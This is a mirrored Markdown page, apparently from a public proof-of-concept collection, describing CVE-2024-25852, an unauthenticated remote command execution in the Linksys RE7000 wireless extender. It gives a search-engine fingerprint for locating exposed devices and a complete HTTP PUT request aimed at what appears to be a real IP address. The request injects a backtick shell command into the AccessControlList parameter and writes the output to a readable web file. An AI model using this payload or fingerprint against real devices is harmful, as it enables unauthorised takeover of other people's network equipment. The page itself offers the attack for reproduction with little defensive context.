mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-10 00:13:36 +00:00
43 lines
1.7 KiB
Markdown
43 lines
1.7 KiB
Markdown
# Linksys-RE7000无线扩展器RCE(CVE-2024-25852)
|
||
|
||
### 一、漏洞描述
|
||
<font style="color:#000000;">Linksys RE7000无线扩展器在访问控制功能点的AccessControlList参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。</font>
|
||
|
||
### 二、影响版本
|
||
<font style="color:#000000;">Linksys RE7000无线扩展器</font>
|
||
|
||
### 三、资产测绘
|
||
body="/login.shtml?ran="
|
||
|
||

|
||
|
||
界面
|
||
|
||

|
||
|
||
### 四、漏洞复现
|
||
```plain
|
||
PUT /goform/AccessControl HTTP/1.1
|
||
Host: 121.137.162.121
|
||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate, br
|
||
Connection: close
|
||
Upgrade-Insecure-Requests: 1
|
||
Content-Length: 87
|
||
|
||
{"AccessPolicy":"0","AccessControlList":"`ip a>/etc_ro/lighttpd/RE7000_www/qqi.txt`"}
|
||
|
||
```
|
||
|
||
构造语句进行发送
|
||
|
||
访问qqi.txt,这个文件,获取相关信息。
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-06-23 23:46:34
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zdaghns0azgvr8ns> |